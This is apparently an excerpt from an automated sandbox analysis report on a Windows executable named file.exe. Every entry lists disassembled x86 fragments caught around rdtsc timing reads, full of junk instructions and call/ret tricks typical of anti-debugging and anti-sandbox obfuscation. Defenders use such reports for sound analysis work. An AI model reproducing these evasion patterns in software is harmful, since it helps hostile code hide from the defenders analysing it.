0x000000a3 jmp 00007F12C08324D5h 0x000000a8 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089DEB second address: 1089E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jnc 00007F12C15B731Ch 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F12C15B7324h 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 jmp 00007F12C15B731Bh 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089E2E second address: 1089E38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F12C08324CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089E38 second address: 1089E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089E48 second address: 1089E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089E4C second address: 1089E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089FBC second address: 1089FCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089FCF second address: 1089FE3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F12C15B7318h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089FE3 second address: 108A0A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F12C08324CFh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 pop eax 0x00000017 pop eax 0x00000018 xor di, AFE0h 0x0000001d push 00000003h 0x0000001f pushad 0x00000020 movzx ebx, di 0x00000023 mov dword ptr [ebp+122D1D44h], eax 0x00000029 popad 0x0000002a push 00000000h 0x0000002c mov edx, dword ptr [ebp+122D3D99h] 0x00000032 push 00000003h 0x00000034 jmp 00007F12C08324D7h 0x00000039 push E85115B7h 0x0000003e jmp 00007F12C08324D4h 0x00000043 xor dword ptr [esp], 285115B7h 0x0000004a mov dword ptr [ebp+122D3474h], edi 0x00000050 lea ebx, dword ptr [ebp+1244EC79h] 0x00000056 push 00000000h 0x00000058 push edi 0x00000059 call 00007F12C08324C8h 0x0000005e pop edi 0x0000005f mov dword ptr [esp+04h], edi 0x00000063 add dword ptr [esp+04h], 0000001Ah 0x0000006b inc edi 0x0000006c push edi 0x0000006d ret 0x0000006e pop edi 0x0000006f ret 0x00000070 or esi, 45757425h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007F12C08324D8h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108A0A7 second address: 108A0B1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F12C15B731Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108A13B second address: 108A146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108A146 second address: 108A1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F12C15B731Eh 0x0000000f mov eax, dword ptr [eax] 0x00000011 jp 00007F12C15B731Eh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007F12C15B7328h 0x00000020 pop eax 0x00000021 jmp 00007F12C15B7321h 0x00000026 push 00000003h 0x00000028 and di, BFB7h 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+122D1C75h], eax 0x00000035 push 00000003h 0x00000037 jne 00007F12C15B7316h 0x0000003d push B9F021A3h 0x00000042 pushad 0x00000043 jmp 00007F12C15B7325h 0x00000048 push ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108A1D1 second address: 108A241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 add dword ptr [esp], 060FDE5Dh 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F12C08324C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 jnp 00007F12C08324CCh 0x0000002d xor esi, dword ptr [ebp+122D3564h] 0x00000033 sbb edi, 5DBE0B4Ah 0x00000039 lea ebx, dword ptr [ebp+1244EC84h] 0x0000003f or dword ptr [ebp+122D1D62h], edx 0x00000045 xchg eax, ebx 0x00000046 jmp 00007F12C08324CAh 0x0000004b push eax 0x0000004c jng 00007F12C08324E5h 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F12C08324D3h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108A241 second address: 108A245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107DAED second address: 107DAF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A93F5 second address: 10A940A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C15B731Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A9558 second address: 10A955C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A96EA second address: 10A96F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A9864 second address: 10A988B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F12C08324D7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A9EA9 second address: 10A9EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F12C15B7324h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A9EC6 second address: 10A9ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A9FF3 second address: 10A9FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10A9FF7 second address: 10AA003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AA2DC second address: 10AA2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AA2E0 second address: 10AA2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AA2E6 second address: 10AA315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007F12C15B7329h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F12C15B731Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AA5A6 second address: 10AA5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AA5AE second address: 10AA5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109E73C second address: 109E756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C08324D5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AA794 second address: 10AA799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AA799 second address: 10AA79F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AA79F second address: 10AA7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AA7A3 second address: 10AA7BD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F12C08324C6h 0x00000008 jno 00007F12C08324C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F12C08324C6h 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AA7BD second address: 10AA7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AB417 second address: 10AB41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AD6A6 second address: 10AD6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107F52C second address: 107F532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B030E second address: 10B0313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6AB1 second address: 10B6AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push ecx 0x0000000b jmp 00007F12C08324D4h 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6C58 second address: 10B6C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6EF2 second address: 10B6EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6EFC second address: 10B6F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F12C15B7316h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B6F0A second address: 10B6F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B7488 second address: 10B74A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F12C15B7320h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B74A2 second address: 10B74BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B7CCC second address: 10B7CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B7CD1 second address: 10B7CED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F12C08324CCh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007F12C08324D4h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B7CED second address: 10B7CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B7DAB second address: 10B7DCD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F12C08324D4h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B7DCD second address: 10B7E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C15B731Ch 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F12C15B7321h 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F12C15B7326h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F12C15B731Ah 0x00000025 push esi 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B7E1E second address: 10B7E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F12C08324C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B8251 second address: 10B8283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C15B7327h 0x00000009 popad 0x0000000a pushad 0x0000000b je 00007F12C15B7316h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007F12C15B7316h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B8283 second address: 10B8289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B83D0 second address: 10B83D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B83D4 second address: 10B83E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F12C08324CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B8926 second address: 10B892A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B892A second address: 10B895D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], ebx 0x00000009 mov esi, dword ptr [ebp+122D3D7Dh] 0x0000000f nop 0x00000010 jg 00007F12C08324CCh 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007F12C08324D4h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B89F7 second address: 10B8A04 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B8A04 second address: 10B8A0A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B8C26 second address: 10B8C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B8E47 second address: 10B8E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B9404 second address: 10B940A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B940A second address: 10B9474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or dword ptr [ebp+122D1D50h], esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F12C08324C8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D1EE9h], ecx 0x00000033 mov si, 13BFh 0x00000037 push ebx 0x00000038 mov esi, edx 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d jns 00007F12C08324CCh 0x00000043 mov dword ptr [ebp+122D1D50h], esi 0x00000049 xchg eax, ebx 0x0000004a pushad 0x0000004b jmp 00007F12C08324D6h 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B9474 second address: 10B947A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B947A second address: 10B9495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F12C08324D1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B9495 second address: 10B94A4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F12C15B7316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B9E7C second address: 10B9E81 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B9E81 second address: 10B9ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007F12C15B7322h 0x0000000e nop 0x0000000f mov dword ptr [ebp+1244F12Fh], ecx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F12C15B7318h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 jc 00007F12C15B7316h 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D1C96h], edi 0x0000003f stc 0x00000040 push eax 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BB9AA second address: 10BB9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BC4DD second address: 10BC4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BC289 second address: 10BC28F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BCDCB second address: 10BCDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BE6C6 second address: 10BE6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BCDCF second address: 10BCE0B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F12C15B7316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F12C15B7329h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F12C15B7325h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C4CB0 second address: 10C4D43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jno 00007F12C08324C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 stc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F12C08324C8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov bx, cx 0x00000031 call 00007F12C08324D5h 0x00000036 mov edi, ecx 0x00000038 pop ebx 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c mov ebx, dword ptr [ebp+122D1D1Fh] 0x00000042 pop edi 0x00000043 xchg eax, esi 0x00000044 jmp 00007F12C08324D4h 0x00000049 push eax 0x0000004a pushad 0x0000004b jng 00007F12C08324C8h 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F12C08324D8h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6D9B second address: 10C6D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CAFF6 second address: 10CB019 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BEF0C second address: 10BEF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C15B7321h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C4ECF second address: 10C4EE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BEF21 second address: 10BEF25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C7F8C second address: 10C7F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10CDF02 second address: 10CDF08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C6032 second address: 10C6038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
